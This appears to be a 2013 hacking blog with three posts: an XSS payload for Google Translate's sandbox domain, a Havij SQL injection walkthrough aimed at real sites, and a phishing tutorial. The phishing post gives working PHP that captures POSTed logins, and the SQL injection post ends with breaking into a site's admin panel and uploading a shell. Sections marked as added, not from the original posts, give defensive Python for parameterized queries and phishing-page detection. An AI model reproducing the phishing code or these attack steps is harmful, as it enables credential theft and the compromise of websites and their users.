Hi everyone. Today I came up with an XSS vulnerability in translate.googleusercontent.com. But as stated in "Program Rules - Application Security - Google", bugs like XSS in sandbox domains do not qualify for a bounty and are not considered bugs.
To reproduce this XSS, go to the document translation page in Google Translate. Then create a .txt document containing the lines below and submit it for translation.
Script to write in the .txt file:
<script>alert("hacked")</script>
After you have created your .txt file, upload it to the page and hit translate. Make sure you are translating it to a language other than English, or else it will not work. You then have XSS in translate.googleusercontent.com.
Thursday, November 14, 2013
Sunday, November 10, 2013
SQL injecting using "Havij - Advanced SQL Injection Tool" [TUT]
Hello guys. Today I'm going to teach you how to exploit sites vulnerable to SQL injection using Havij, an automatic Advanced SQL Injection Tool.
So let's start the tutorial to hack a website using Havij.
With SQL injection you get the website's database. First you should know what a database is.
The website database is a collection of information such as images, login IDs, passwords, company data, etc.
It is all stored in a server database so that it can be easily accessed, managed and updated. In one view, databases can be classified according to types of content: bibliographic, full-text, numeric, images, etc.
What is Havij?
Havij Pro is an advanced SQLi vulnerability exploiter that can exploit a SQL injection vulnerability in a website and gain access to the website's database. Havij is an automatic advanced SQLi tool.
So let's start.
Using Havij is the easy way. There aren't any complicated steps to follow, unlike when you are injecting manually.
But you won't know what Havij is actually doing if you haven't learned manual SQL injection.
Things you will need:
Havij Pro (Google it or comment if you can't find it)
A website vulnerable to SQL injection (you can use Google dorks to find one)
And probably a BRAIN. :P
NOTE: If you want to find SQL injection in a particular website, you can use Acunetix or an OWASP vulnerability scanner.
The real deal comes here. [EASY]
After you have found a SQL injection vulnerability in a website, enter the website URL into the Target box and analyze it.
After analyzing, you can see that it finds the database name, tables and other things.
Always keep an eye on the STATUS BOX [Log].
Now that we have the database name and tables, let's find the columns and the data: emails, users, passwords, etc.
After getting the database name, you can see that the "Tables" button is activated and we can read the tables.
Just click on "Tables" and you will get the tables.
Here we have succeeded in finding the database tables; now it's time to find the database rows and columns, so click on Get DBs.
Get DBs loads all databases into the program so they are easily accessible. Now click on Get Tables again.
Finally we have the 'users' table. Now select users and click on 'Get Columns'.
After getting the columns, click on 'Get Data' and you will get all the login IDs and passwords.
So here we have the website admin ID and password. Now you have to decrypt the password if it is hashed. [In most websites passwords are hashed.]
Now it's time to enter the website using these two, the admin login ID and password.
To find the admin page, click on 'Find Admin' and click on Start to analyze.
Now go to the admin URL and log in with the ID and password you got from the database. Now you have successfully hacked into a website.
You just need to upload the shell and do much more exciting things.
If you don't have a vulnerable website, just create a penetration testing lab on your computer, such as OWASP-BWA, DVWA, etc.
NOTE: This article is for educational purposes only. I am not responsible for any misuse of this article. Remember that hacking is illegal in most of the countries. You can create a Pentesting lab and test your skills there.
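From the defender's side, the walkthrough above depends on two things: a query built by string concatenation, and a users table whose password column is usable once read. The following added example (not from the original post; the table, column and function names are constructed for illustration) puts a concatenated lookup next to a parameterized one in Python's sqlite3, and stores passwords as salted PBKDF2 hashes, which cannot be decrypted, only guessed.

```python
import hashlib
import hmac
import os
import sqlite3

def hash_password(password, salt=None):
    """Return (salt, digest) using PBKDF2-HMAC-SHA256 with a per-user salt."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return salt, digest

def verify_password(password, salt, digest):
    # Constant-time comparison of the recomputed digest with the stored one.
    return hmac.compare_digest(hash_password(password, salt)[1], digest)

def make_db():
    """Constructed sample database: two users in an in-memory SQLite table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, salt BLOB, pw BLOB)")
    for uid, login, pw in [(1, "admin", "s3cret-admin"), (2, "alice", "alice-pw")]:
        salt, digest = hash_password(pw)
        db.execute("INSERT INTO users VALUES (?, ?, ?, ?)", (uid, login, salt, digest))
    return db

def lookup_vulnerable(db, user_id):
    # BAD: the request parameter becomes part of the SQL text, so input such
    # as "1 OR 1=1" changes the structure of the query.
    return db.execute("SELECT login FROM users WHERE id = " + user_id).fetchall()

def lookup_parameterized(db, user_id):
    # GOOD: the value is bound as data and can never add SQL syntax.
    return db.execute("SELECT login FROM users WHERE id = ?", (user_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    tampered = "1 OR 1=1"  # constructed request parameter
    print("vulnerable   :", lookup_vulnerable(db, tampered))
    print("parameterized:", lookup_parameterized(db, tampered))
    print("normal lookup:", lookup_parameterized(db, "2"))
```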
Saturday, November 9, 2013
Phishing Page [TUT] - Noob Friendly
Phishing has become a very easy-to-use trick to hack usernames and passwords of users.
Today I will teach you guys how to create a phishing page for almost any site which uses a login form (for example: Facebook, Gmail, Yahoo, etc.).
For making a phishing page and using this method of hacking you need a hosting site (Google it for free web hosting sites) or your own website.
Register yourself at a free hosting site.
Note: This article is for only educational purposes. Please do not attempt this method on real users. I am not responsible for any damage caused by this.
Well, now that you have a hosting account, let's start to create the phishing page.
Step one.
First go to the target site. In your browser select Save As from the File menu and save the site on your computer with the name "login.html".
Alternatively, right click on the page, click "view source", copy all of it and save it to a notepad file.
Rename the file to "login.html".
Now step two.
Open up your Notepad and copy this into it:
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Replace facebook.com with the URL you want the user to be redirected to after he clicks on the login button.
Save the page as Phish.php.
Now you need to edit the "login.htm" file we saved earlier. So navigate to it and open it with Notepad.
Now search for any HTML like "action=" which has something to do with login, and replace the URL with "Phish.php".
Also create a blank txt file with the name "log.txt". This file will be used to save the victims' logins and passwords.
Now you are done with making the phishing page.
Go to your hosting account and upload all the files to your server. You should upload all three files.
Now go to the URL provided by your host.
Like - http://faceboook-1.hostingsite.com/login.htm
And you will see the phishing page as it is on the real site.
For testing, type anything in the login and password fields and hit the login button.
Check the log.txt file. The password and username you entered previously will be saved in the log.txt file.
WOW, you just have your own phishing page now.
Note: If you have any doubts or don't know where to create a hosting account, feel free to comment. I will try to reply to you as soon as possible.
ONCE AGAIN NOTE: This article is for only educational purposes. Please do not attempt this method on real users. I am not responsible for any damage caused by this.
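Seen from the defending side, the page built above has a recognisable shape: markup copied from a known brand, a password field, and a form that posts to a handler on a host the brand does not own. The following added example (not from the original post) flags that combination; the brand table, function names and sample HTML are constructed for illustration, and a real deployment would take the brand list from its own inventory.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumption: brand keyword -> domains the brand really uses for login.
BRAND_DOMAINS = {"facebook": {"facebook.com"}, "gmail": {"google.com"}}
# Constructed sample of a copied login page whose form action was rewritten.
SAMPLE_HTML = (
    '<html><head><title>Log in to Facebook</title></head><body>'
    '<form action="Phish.php" method="post"><input name="email">'
    '<input type="password" name="pass"></form></body></html>'
)

class LoginFormParser(HTMLParser):
    """Collects form actions, password-field presence and the page title."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password, self.title = [], False, ""
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True
    def handle_data(self, data):
        # lasttag is the most recent start tag, so this collects title text.
        if self.lasttag == "title":
            self.title += data

def on_domain(host, domain):
    return host == domain or host.endswith("." + domain)

def check_page(page_url, html):
    """Return findings for a page that imitates a brand login off-domain."""
    p = LoginFormParser()
    p.feed(html)
    if not p.has_password:
        return []
    host = (urlparse(page_url).hostname or "").lower()
    findings = []
    for brand, domains in BRAND_DOMAINS.items():
        if brand not in p.title.lower() or any(on_domain(host, d) for d in domains):
            continue
        findings.append(f"{brand} login markup served from {host}")
        for action in p.actions:
            target = (urlparse(urljoin(page_url, action)).hostname or "").lower()
            if not any(on_domain(target, d) for d in domains):
                findings.append(f"credentials post to {target}")
    return findings
```

The same check can run over URLs reported by users or seen in mail and proxy logs; a non-empty result is a reason to block the host and report it to its hosting provider.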

